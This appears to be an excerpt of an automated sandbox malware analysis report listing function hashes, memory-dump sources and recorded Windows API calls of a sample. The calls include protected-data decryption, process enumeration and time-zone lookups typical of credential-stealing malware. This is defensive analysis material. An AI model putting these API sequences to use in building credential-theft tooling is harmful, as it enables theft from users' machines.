                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: >O~
                                  • API String ID: 4291131564-300424825
                                  • Opcode ID: e1804ec434116b8242ea8a83f5364a8e1fef688660ff52da0119236b343aaf63
                                  • Instruction ID: 84541ec6cd7638eeed7f99483794dac73b59175c75619f943991b27f5a7eb642
                                  • Opcode Fuzzy Hash: e1804ec434116b8242ea8a83f5364a8e1fef688660ff52da0119236b343aaf63
                                  • Instruction Fuzzy Hash: 67119374241308AFEB11CFA4CC95FAA77B9FB89B10F208558FA159B390C7B6A941CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: _Aeo$bN7_$fB5$j3$/}^
                                  • API String ID: 0-522225641
                                  • Opcode ID: 939957dc9e16ea807590720e212413c8b076b62be66cb3761adc9725a86e1500
                                  • Instruction ID: d02bbfa3c83be676803070173228a656d8a52b4c0b1a29b660ba4db1a9546b8b
                                  • Opcode Fuzzy Hash: 939957dc9e16ea807590720e212413c8b076b62be66cb3761adc9725a86e1500
                                  • Instruction Fuzzy Hash: E8A2F3F3A0C2009FE3046E2DEC8566AFBE5EF94320F1A493DEAC487344E67558458B97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :T@H$Fu{$pH* $sW}{$mt%
                                  • API String ID: 0-703542919
                                  • Opcode ID: c4b4a821f164b6803f87b31d981829ce7585af3b5a8dcc00875d666b4593a010
                                  • Instruction ID: 16ca3a1692506354eecb2a7b22c5e7ffa8b29af158300dea3e6a4ca0b5215dc9
                                  • Opcode Fuzzy Hash: c4b4a821f164b6803f87b31d981829ce7585af3b5a8dcc00875d666b4593a010
                                  • Instruction Fuzzy Hash: 48A203B3A0C2149FD3046E2DEC8567ABBE5EFD4720F1A493DEAC487744EA3598058793
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: \u$\u${${$}$}
                                  • API String ID: 0-582841131
                                  • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction ID: b476341b8d082a770d1e256f40c0b119247639ca5cbc22cac9a776608ddac622
                                  • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction Fuzzy Hash: E2418D12E19BD9C5CB058B7844A02AEBFB27FE6210F6D42AEC49D5F383C774414AD3A5
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 007EC971
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 007EC97C
                                  • lstrcat.KERNEL32(?,00800B47), ref: 007ECA43
                                  • lstrcat.KERNEL32(?,00800B4B), ref: 007ECA57
                                  • lstrcat.KERNEL32(?,00800B4E), ref: 007ECA78
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 2d22c72bddfc4914a125af9bc6ae6f0b97686d575230bbbfa6f6274907f9c7d9
                                  • Instruction ID: 61547cbcd1237e1ad6f8973b3eedf310dfcc4f6256d8232e93ddb8f9040a01eb
                                  • Opcode Fuzzy Hash: 2d22c72bddfc4914a125af9bc6ae6f0b97686d575230bbbfa6f6274907f9c7d9
                                  • Instruction Fuzzy Hash: 9F4173B590421EDBDB10DF94DC89BFEB778BB48304F0042A8E509A6281D7745A85CF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 007E72AD
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007E72B4
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007E72E1
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 007E7304
                                  • LocalFree.KERNEL32(?), ref: 007E730E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 94b351d4994c53bf90b2f9a2649af8853b350ea4e8629a3dc422083b5f4cb565
                                  • Instruction ID: beef04290c36ec3c9de20a6d1b543176faf1492fd7e71c2b7913248bae17fe14
                                  • Opcode Fuzzy Hash: 94b351d4994c53bf90b2f9a2649af8853b350ea4e8629a3dc422083b5f4cb565
                                  • Instruction Fuzzy Hash: C1011E75A44308BBDB14DFE8DC46FAE7778EB48B00F104644FB05BB2D1D6B0AA019B65
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007F97AE
                                  • Process32First.KERNEL32(00800ACE,00000128), ref: 007F97C2
                                  • Process32Next.KERNEL32(00800ACE,00000128), ref: 007F97D7
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 007F97EC
                                  • CloseHandle.KERNEL32(00800ACE), ref: 007F980A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: 5ab36a1396fcdf13807c19e8c9b081fbd70c0feb9b19982e45b1c069fef0739f
                                  • Instruction ID: 92ea1ffd1b016ff3196db8e462d3e255fb1556fc75e5476e6f71c868d152f8bb
                                  • Opcode Fuzzy Hash: 5ab36a1396fcdf13807c19e8c9b081fbd70c0feb9b19982e45b1c069fef0739f
                                  • Instruction Fuzzy Hash: E1010C75A14208EBDB20DFA4DD44BEDB7F8BB48700F104688E60997260DB749A40CF60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <7\h$huzx
                                  • API String ID: 0-2989614873
                                  • Opcode ID: 302405f28a2c7e4f2f56963709478e3905fd8b0be096c3929ab9b1d6b915724c
                                  • Instruction ID: 69d30060aa077b32fb2b6c2aa5912bb92a5d00a68f8630e73ee1d7e38873c204
                                  • Opcode Fuzzy Hash: 302405f28a2c7e4f2f56963709478e3905fd8b0be096c3929ab9b1d6b915724c
                                  • Instruction Fuzzy Hash: 8463637245EBD91EC727CB304BB61927F66FA1321031949CEC9C1CB4F3C6909A26E766
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: nJ3$pc_}$x~{${M<_
                                  • API String ID: 0-1034907141
                                  • Opcode ID: 8022c1d04545622f149a08f970c3d0cf7fc40591cb66eb1bdf2a73a2b58da35f
                                  • Instruction ID: a03d4a0373c0b6c289000c1fd76805c7cc9a1deefc2110d06bc418a1b62d515d
                                  • Opcode Fuzzy Hash: 8022c1d04545622f149a08f970c3d0cf7fc40591cb66eb1bdf2a73a2b58da35f
                                  • Instruction Fuzzy Hash: 2FB229F3A0C2009FE3046E2DDC8567ABBE9EF94720F1A493DEAC5C3744EA7558058697
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,007E51D4,40000001,00000000,00000000,?,007E51D4), ref: 007F9050
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: dc0f4fe2e312c2e5e6c6b48df21571028dcb9e32bb58f1b9f91fea79a6c8b376
                                  • Instruction ID: 6848035aa073468a9a43e08b72b119506f4fe47722d58b2d013934324dc5361c
                                  • Opcode Fuzzy Hash: dc0f4fe2e312c2e5e6c6b48df21571028dcb9e32bb58f1b9f91fea79a6c8b376
                                  • Instruction Fuzzy Hash: 5811C874204209FFDF04DF98D885FBA33A9AF89310F108558FB198B351DB79E9419B61
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00800DE8,00000000,?), ref: 007F7B40
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F7B47
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00800DE8,00000000,?), ref: 007F7B54
                                  • wsprintfA.USER32 ref: 007F7B83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 4e88dee113fb492f4e42ab188a5f0b2d34d1dfdd932aa27960747fa684e26968
                                  • Instruction ID: b98dd0e2d6d3fe68b85c0fe208b2f0e11d1ccdf196874152ce3cbdba77906840
                                  • Opcode Fuzzy Hash: 4e88dee113fb492f4e42ab188a5f0b2d34d1dfdd932aa27960747fa684e26968
                                  • Instruction Fuzzy Hash: 0A1115B2908218AACB14DBD9DD45BBEB7B8EB8CB11F10421AF605A2290E6795940C7B0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0145D890,00000000,?,00800DF8,00000000,?,00000000,00000000), ref: 007F7BF3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F7BFA
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0145D890,00000000,?,00800DF8,00000000,?,00000000,00000000,?), ref: 007F7C0D
                                  • wsprintfA.USER32 ref: 007F7C47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: e48e2d00a236f4d77c66a33ddfad56f324da0e41ee10ff89ce0062ed18bfe1f9
                                  • Instruction ID: ac5ce11748aedd0bbd5b550b7f278eb6895d3d8d0513d7a5ca2866817a6bfede
                                  • Opcode Fuzzy Hash: e48e2d00a236f4d77c66a33ddfad56f324da0e41ee10ff89ce0062ed18bfe1f9
                                  • Instruction Fuzzy Hash: 2C118EB1A09218EBEB24DB54DC45FA9B778FB44721F100395F61AA73D0D7785A40CF50
                                  APIs
                                  • CoCreateInstance.COMBASE(007FE120,00000000,00000001,007FE110,00000000), ref: 007F39A8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 007F3A00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
